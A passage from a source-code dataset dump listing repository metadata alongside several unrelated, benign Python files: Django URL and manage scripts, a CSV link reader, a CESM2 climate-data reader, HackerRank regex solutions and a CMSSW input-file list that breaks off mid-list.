] | seatonullberg@gmail.com |
a25199bba01db10b42a11ff3f9af31b72b291e1c | ed538eba0bb81713d8353dea5baafd038913d52c | /photos/urls.py | af4fb96be4ef12b78a66dbe5fbb0f4a0609e76be | [] | no_license | Ansagan-Kabdolla/photo_site | 78cf738ff948cbf7d2207bff6166dcbe44679e1e | 19228dc3abeab9cc301962c970b15fcf040e2577 | refs/heads/master | 2022-06-04T20:06:07.798864 | 2020-05-02T20:05:28 | 2020-05-02T20:05:28 | 260,765,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.urls import path
from .views import *
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('', index),
path('subservices/<int:pk>', subservice_example, name = 'subservices')
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"ansagankabdolla4@gmail.com"
] | ansagankabdolla4@gmail.com |
2abbbfc944cae908462b4e0cc04fb9174416e903 | 028274f08da4c616ccc1362df390dcfe58131fc6 | /DS_Management_Tools/run_ExcelHelper.py | 22b9388f9a6cc7741b030fca1b6a1d306b66c178 | [] | no_license | PyWilhelm/EDRIS_DS | 8a5430515bfc7e11abf846126f4fa2388ff59dd9 | cc0179495d8874ff5a95fd08d833388f434e1d87 | refs/heads/master | 2021-01-17T00:43:01.560668 | 2016-07-23T10:50:09 | 2016-07-23T10:50:09 | 64,011,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ExcelHelper
ExcelHelper.run() | [
"ziyang.li.nk@gmail.com"
] | ziyang.li.nk@gmail.com |
5820dfd31c14197589ff85b20ee3c09ef20a8d93 | 434d5256fa47c6bec0e5d79917f2d09b52490fa0 | /tests/pypint/plugins_tests/implicit_solvers_tests/__init__.py | 540bd2c49fa5e3540bed00c4ec8613618cf57d42 | [] | no_license | Parallel-in-Time/PyPinT | 2d0a54d21a6b50863c6acef69eb9a86d3bcc7fcf | 90aed34cf43d633e44f56444f6c5d4fa39619663 | refs/heads/master | 2016-08-03T18:58:05.269042 | 2014-06-10T08:27:30 | 2014-06-10T08:32:45 | 19,447,961 | 0 | 2 | null | 2014-06-02T14:26:08 | 2014-05-05T07:39:20 | Python | UTF-8 | Python | false | false | 168 | py | # coding=utf-8
import unittest
class ImplicitSolversTests(unittest.TestSuite):
def __init__(self):
pass
if __name__ == "__main__":
unittest.main()
| [
"t.klatt@fz-juelich.de"
] | t.klatt@fz-juelich.de |
0d7ef97c64cbb51cb2f664c2765cc5b6d54098a1 | 09aee268ce72d282f53fe94f42478e2b3b48127d | /CBVProject_3/manage.py | ba051715cec14ce97e5ac0aec7233658f5f881dd | [] | no_license | keshava519/Django_Projects | c95d0f8c55d4cc946291be6fb058b7298aefe596 | 99584892b9d9ec6b6395a382c684b4d036d07874 | refs/heads/main | 2023-02-23T03:44:32.110742 | 2021-01-27T15:15:13 | 2021-01-27T15:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CBVProject_3.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"keshava.cadcam@gmail.com"
] | keshava.cadcam@gmail.com |
8064c42bc3d64fe11d2c1fd47af31b2a447da64d | 02b73216f3970a981dc4bb8eea67f876edc8797f | /funcs.py | fe84dcb18d1b1a6db59299839394a4877e94586a | [] | no_license | Coul33t/LinkReader | b44eff04a8979af3884e70ccbe165ee9d8e7ae8c | 7396fc8888eec7182783f5cb08e338dbac314637 | refs/heads/master | 2020-04-19T14:49:18.764694 | 2019-02-01T00:10:20 | 2019-02-01T00:10:20 | 168,254,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | import csv
import random as rn
import pdb
from constants import VIDEO_LIST
class LinkReader:
def __init__(self):
self.links = []
def has_links(self):
return len(self.links)
def import_links(self, csv_file):
with open(csv_file, newline='') as csvfile:
contents = csv.reader(csvfile, delimiter=' ', quotechar='|')
# return a list containing [link, fav or like, image or video)]
self.links.extend([{'link': row[0].split(',')[1], 'category':row[0].split(',')[2], 'content_type':'video' if any(n in row[0].split(',')[1] for n in VIDEO_LIST) else 'image'} for row in contents])
def get_links(self, beg=0, end=50, category=None, link_only=True):
if not category:
if link_only:
return [list(link.keys())[0] for link in self.links[beg:end]]
else:
return self.links[beg:end]
def get_random_link(self, number=1, category=None, link_only=True, content_type=None):
sub_list = self.links.copy()
if category:
sub_list = [x['link'] for x in sub_list.items() if x['category'] == category]
if content_type:
sub_list = [x['link'] for x in sub_list.items() if x['content_type'] == content_type]
rn_list = rn.sample(range(len(sub_list)), number)
if link_only:
return [sub_list[i]['link'] for i in rn_list]
return [sub_list[i] for i in rn_list]
if __name__ == '__main__':
l_r = LinkReader()
l_r.import_links('favorites.csv')
l_r.import_links('likes.csv')
pdb.set_trace() | [
"Coulis1990@gmail.com"
] | Coulis1990@gmail.com |
edf872d10b298121ef5d6521f18b67f5da91035e | e40381a0aa3320616e5a5b82533c2c5cfe0fa2ce | /Scripts/read_CESM2LE.py | 249135375ede80d7dabbc6d87de8ba81b7b0899b | [
"MIT"
] | permissive | zmlabe/predictGMSTrate | 7220b26f86839699635fe2f04e45348095183bc7 | ac4238c7f1c33dc9d30382e4dbdc26a2f63352f5 | refs/heads/main | 2023-04-10T03:46:16.053123 | 2023-01-11T14:08:27 | 2023-01-11T14:08:27 | 396,942,451 | 4 | 3 | MIT | 2022-01-19T22:15:19 | 2021-08-16T19:30:55 | Python | UTF-8 | Python | false | false | 8,653 | py | """
Function(s) reads in monthly data from CESM2-LE for different variables
using # of ensemble members for all time periods
Notes
-----
Author : Zachary Labe
Date : 25 June 2021
Usage
-----
[1] read_CESM2LE(directory,vari,sliceperiod,sliceshape,slicenan,numOfEns,timeper)
"""
def read_CESM2LE(directory,vari,sliceperiod,sliceshape,slicenan,numOfEns,timeper):
"""
Function reads monthly data from CESM2-LE
Parameters
----------
directory : string
path for data
vari : string
variable for analysis
sliceperiod : string
how to average time component of data
sliceshape : string
shape of output array
slicenan : string or float
Set missing values
numOfEns : number of ensembles
integer
timeper : time period of analysis
string
Returns
-------
lat : 1d numpy array
latitudes
lon : 1d numpy array
longitudes
var : numpy array
processed variable
Usage
-----
read_CESM2LE(directory,vari,sliceperiod,sliceshape,
slicenan,numOfEns,timeper)
"""
print('\n>>>>>>>>>> STARTING read_CESM2LE function!')
### Import modules
import numpy as np
from netCDF4 import Dataset
import calc_Utilities as UT
###########################################################################
### Parameters
time = np.arange(1850,2100+1,1)
mon = 12
ens1 = np.arange(1,10+1,1)
ens2 = np.arange(21,50+1,1)
ens = np.append(ens1,ens2)
###########################################################################
### Read in data
membersvar = []
for i,ensmember in enumerate(ens):
filename = directory + '%s/%s_%s_1850-2100.nc' % (vari,vari,
ensmember)
data = Dataset(filename,'r')
lat1 = data.variables['latitude'][:]
lon1 = data.variables['longitude'][:]
var = data.variables['%s' % vari][:,:,:]
data.close()
print('Completed: read *CESM2-LE* Ensemble Member --%s-- %s' % (ensmember,vari))
membersvar.append(var)
del var
membersvar = np.asarray(membersvar)
ensvalue = np.reshape(membersvar,(len(ens),time.shape[0],mon,
lat1.shape[0],lon1.shape[0]))
del membersvar
print('Completed: read all CESM2-LE Members!\n')
###########################################################################
### Slice over months (currently = [ens,yr,mn,lat,lon])
### Shape of output array
if sliceperiod == 'annual':
ensvalue = np.nanmean(ensvalue,axis=2)
if sliceshape == 1:
ensshape = ensvalue.ravel()
elif sliceshape == 4:
ensshape = ensvalue
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: ANNUAL MEAN!')
elif sliceperiod == 'DJF':
ensshape = np.empty((ensvalue.shape[0],ensvalue.shape[1]-1,
lat1.shape[0],lon1.shape[0]))
for i in range(ensvalue.shape[0]):
ensshape[i,:,:,:] = UT.calcDecJanFeb(ensvalue[i,:,:,:,:],
lat1,lon1,'surface',1)
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: DJF MEAN!')
elif sliceperiod == 'MAM':
enstime = np.nanmean(ensvalue[:,:,2:5,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: MAM MEAN!')
elif sliceperiod == 'JJA':
enstime = np.nanmean(ensvalue[:,:,5:8,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: JJA MEAN!')
elif sliceperiod == 'SON':
enstime = np.nanmean(ensvalue[:,:,8:11,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: SON MEAN!')
elif sliceperiod == 'JFM':
enstime = np.nanmean(ensvalue[:,:,0:3,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: JFM MEAN!')
elif sliceperiod == 'AMJ':
enstime = np.nanmean(ensvalue[:,:,3:6,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: AMJ MEAN!')
elif sliceperiod == 'JAS':
enstime = np.nanmean(ensvalue[:,:,6:9,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: JAS MEAN!')
elif sliceperiod == 'OND':
enstime = np.nanmean(ensvalue[:,:,9:,:,:],axis=2)
if sliceshape == 1:
ensshape = enstime.ravel()
elif sliceshape == 4:
ensshape = enstime
print('Shape of output = ', ensshape.shape,[[ensshape.ndim]])
print('Completed: OND MEAN!')
elif sliceperiod == 'none':
if sliceshape == 1:
ensshape = ensvalue.ravel()
elif sliceshape == 4:
ensshape= np.reshape(ensvalue,(ensvalue.shape[0],ensvalue.shape[1]*ensvalue.shape[2],
ensvalue.shape[3],ensvalue.shape[4]))
elif sliceshape == 5:
ensshape = ensvalue
print('Shape of output =', ensshape.shape, [[ensshape.ndim]])
print('Completed: ALL RAVELED MONTHS!')
###########################################################################
### Change missing values
if slicenan == 'nan':
ensshape[np.where(np.isnan(ensshape))] = np.nan
ensshape[np.where(ensshape < -999)] = np.nan
print('Completed: missing values are =',slicenan)
else:
ensshape[np.where(np.isnan(ensshape))] = slicenan
ensshape[np.where(ensshape < -999)] =slicenan
###########################################################################
### Change units
if any([vari=='SLP',vari=='PS']):
ensshape = ensshape/100 # Pa to hPa
print('Completed: Changed units (Pa to hPa)!')
elif any([vari=='T2M',vari=='SST']):
ensshape = ensshape - 273.15 # K to C
print('Completed: Changed units (K to C)!')
elif any([vari=='PRECL',vari=='PRECC',vari=='PRECT']):
ensshape = ensshape * 8.64e7 # m/s to mm/day
### "Average Monthly Rate of Precipitation"
print('*** CURRENT UNITS ---> [[ mm/day ]]! ***')
###########################################################################
### Select years of analysis (1850-2100)
if timeper == 'all':
print('ALL SIMULATION YEARS')
print(time)
histmodel = ensshape
elif timeper == 'historical':
yearhistq = np.where((time >= 1950) & (time <= 2019))[0]
print('HISTORICAL YEARS')
print(time[yearhistq])
histmodel = ensshape[:,yearhistq,:,:]
elif timeper == 'future':
yearhistq = np.where((time >= 2020) & (time <= 2099))[0]
print('FUTURE YEARS')
print(time[yearhistq])
histmodel = ensshape[:,yearhistq,:,:]
elif timeper == 'hiatus':
yearhistq = np.where((time >= 1979) & (time <= 2099))[0]
print('HIATUS YEARS')
print(time[yearhistq])
histmodel = ensshape[:,yearhistq,:,:]
print('Shape of output FINAL = ', histmodel.shape,[[histmodel.ndim]])
print('>>>>>>>>>> ENDING read_CESM2LE function!')
return lat1,lon1,histmodel
# ### Test functions - do not use!
# import numpy as np
# import matplotlib.pyplot as plt
# import calc_Utilities as UT
# directory = '/Users/zlabe/Data/CESM2-LE/monthly/'
# vari = 'OHC100'
# sliceperiod = 'annual'
# sliceshape = 4
# slicenan = 'nan'
# numOfEns = 40
# timeper = 'all'
# lat,lon,var = read_CESM2LE(directory,vari,sliceperiod,sliceshape,slicenan,numOfEns,timeper)
# lon2,lat2 = np.meshgrid(lon,lat)
# ave2 = UT.calc_weightedAve(var,lat2)
| [
"zmlabe@rams.colostate.edu"
] | zmlabe@rams.colostate.edu |
3480b284dcaed2749f6f58fa86e06e8053cb57ff | 81fe7f2faea91785ee13cb0297ef9228d832be93 | /HackerRank/Contests/RegularExpresso2.py | cb6b298b2549f14cd035b21bfb764ca316fc44b7 | [] | no_license | blegloannec/CodeProblems | 92349c36e1a35cfc1c48206943d9c2686ea526f8 | 77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e | refs/heads/master | 2022-05-16T20:20:40.578760 | 2021-12-30T11:10:25 | 2022-04-22T08:11:07 | 54,330,243 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,107 | py | #!/usr/bin/env python
import sys
import re
#Regex_Pattern = r'(te|b|a|t|r)$'
#Regex_Pattern = r'^(A{1,3})?(a{1,3}A{1,3})*(a{1,3})?$'
#Regex_Pattern = r'(.)\1\1.{,2}.{20}$|(.)\2\2.{,2}.{15}$|(.)\3\3.{,2}.{10}$|(.)\4\4.{,2}.{5}$|(.)\5\5.{,2}$|(.).{4}\6.{4}\6'
#Regex_Pattern = r'10(11|00)*$'
Regex_Pattern = r'(00|11(10(11)*00)*01)*'
#Regex_Pattern = r'(?=^.{20}$)(?!^.*\n)(?=^.*[a-z])(?=^.*[A-Z].*[A-Z])(?!^(..)*0)(?!^1)(?!^.{3}1)(?!^.{5}1)(?!^.{7}1)(?!^.{8}1)(?!^.{9}1)(?!^.{11}1)(?!^.{13}1)(?!^.{14}1)(?!^.{15}1)(?!^.{17}1)(?!^.{19}1)(?!^2)(?!^.*2$)(?!^.*345)(?!^.*354)(?!^.*435)(?!^.*453)(?!^.*534)(?!^.*543)(?!^(..)*.6)(?!^.*7.*7)(?!^.*8.*8.*8)(?!^.*9.*9.*9.*9)'
#Regex_Pattern = r'(?=^([^ab]*a[^ab]*b([^ab]*b[^ab]*a)*)*[^ab]*$|^([^ab]*b[^ab]*a([^ab]*a[^ab]*b)*)*[^ab]*$)(?=^([^cd]*c[^cd]*d([^cd]*d[^cd]*c)*)*[^cd]*$|^([^cd]*d[^cd]*c([^cd]*c[^cd]*d)*)*[^cd]*$)'
#Regex_Pattern = r'(?=.*P)(?!.*P.*P)(?=^(R(RL|UD|RT(UD|TT)*UL(LR|RL|P)*RD(UD+TT)*TL|RT(UD|TT)*UL(LR|RL|P)*LJD)*L)*$)'
print len(Regex_Pattern)
for l in sys.stdin.readlines():
print str(bool(re.search(Regex_Pattern, l))).lower()
| [
"blg@gmx.com"
] | blg@gmx.com |
1c69f26854c7dc8b97a6f5b1a112887dee9bc0a5 | 993ef8924418866f932396a58e3ad0c2a940ddd3 | /Production/python/Summer20UL18/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8_cff.py | cd36dfc4221d14a5c4af6bbf425f9b192d53e09f | [] | no_license | TreeMaker/TreeMaker | 48d81f6c95a17828dbb599d29c15137cd6ef009a | 15dd7fe9e9e6f97d9e52614c900c27d200a6c45f | refs/heads/Run2_UL | 2023-07-07T15:04:56.672709 | 2023-07-03T16:43:17 | 2023-07-03T16:43:17 | 29,192,343 | 16 | 92 | null | 2023-07-03T16:43:28 | 2015-01-13T13:59:30 | Python | UTF-8 | Python | false | false | 89,463 | py | import FWCore.ParameterSet.Config as cms
# CMSSW job configuration fragment: declares the event source for a
# ZJetsToNuNu HT-400To600 MiniAOD sample. The file list is attached to
# `readFiles` below via readFiles.extend(...).
# Process all events in the listed input files (-1 = no limit).
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
# Primary and secondary input file lists, populated later in this module.
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
# PoolSource reads the ROOT files listed in readFiles/secFiles.
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/120000/5E487166-449F-9044-963E-438A0F76C8CC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/02BA3D25-71BE-A24E-AF31-A3E0014D4B2D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/034A9BA1-AB34-3348-BB2F-EB6895D8CFE9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/04C2BF5A-7141-5C42-A2F2-4EDCECFB6D7A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/06CD4088-EE68-EB44-BDCD-16B905F184CD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/0906507E-7F13-FC44-999E-303122D26AFB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/10EED063-2574-474A-AF18-C2F2C314CD59.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/17F498D4-22E7-B048-B3C7-5DF147955068.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1D3FD3A3-31C9-4342-9559-252CAB598102.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1D7FF9EE-3DED-CD4E-A4FD-7FCE22130479.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1E13D8DA-13CD-6545-962E-969427053E10.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/1EC2CF25-9C9B-1A41-BB8A-3C5502F0800F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/235A8519-5CFC-F148-A9E0-326CE8D46067.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/24C2F20F-06D7-A249-AC23-8DCFA783C23F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/24F338BF-5AF1-B649-93E1-A9F18481EFA9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/28E32658-BD55-584C-BB2B-3BDDBC57FBEA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/28EAE368-1304-D24C-9477-F69E191452B2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/2ABC56F6-4AEC-A649-A7D2-6BC1CB2F87E9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/2C0AC2AE-1BC7-2144-8C3A-7531185E2254.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/2D0D429A-B95A-0C41-8677-FB7397DE9C3E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/33D1FF0A-7EC6-044B-B84F-061646D8DF65.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/35D1D197-F10A-2548-A9EF-C8944F101A86.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/39047BB9-7FD4-4243-B7F7-3E697A4B4778.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/519BBC54-8576-C440-A9A3-BC15FA2611BA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/539A9F8D-AFF6-994F-8509-AA838986D3F9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/55D35C0D-4D56-D34F-BA5D-DF310C6DDE0F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/57652518-3911-5044-AE6B-38EBA145C485.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/5799039A-9735-D140-B21C-71BB74DC5555.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/5FA433C7-340B-B14F-8C8B-23C3DD0043DF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/60A7E4FC-BD61-A245-AFF5-755E65D840BB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/60DA800F-8D24-2E41-88E2-C76363471D61.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/61922E71-2776-A748-824A-DD24F045426B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/631A842C-36FE-B443-AF43-194D232802D0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6372F3CB-1ACB-9940-870D-F57E96D1B730.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/64485CFE-EF61-BA42-BE12-E7AB4E17F237.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/665DF56F-F543-7C44-8EBE-8FF532424958.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6CBED4C2-6CA5-1543-ACFB-410058363BE5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6EF6E61C-17EC-6A48-A4DC-1D4F4EF9EE01.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/6FEEAD1C-F0C5-F845-BA18-40559F6E2131.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/771F11D9-3378-D149-89A4-1A3C72A44C61.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/7D611D18-9102-4249-BFAA-62E326FC5F54.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/8041302E-E7E4-DE4B-AC51-83F4131C73A2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/84945C36-38C7-FF44-9969-0471F9393C08.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/85E9C311-BD09-2249-AE05-71B3B3F5F13A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/88CFA843-547F-654E-AC48-216CAECD3805.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/8BA250F3-EB6E-0747-9768-1EA1E0AF794F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/92CFBF74-0123-8D49-8587-064FA9EA4AAE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/92DA11BF-A42B-3E4F-A9B5-0608DC5E0153.root',
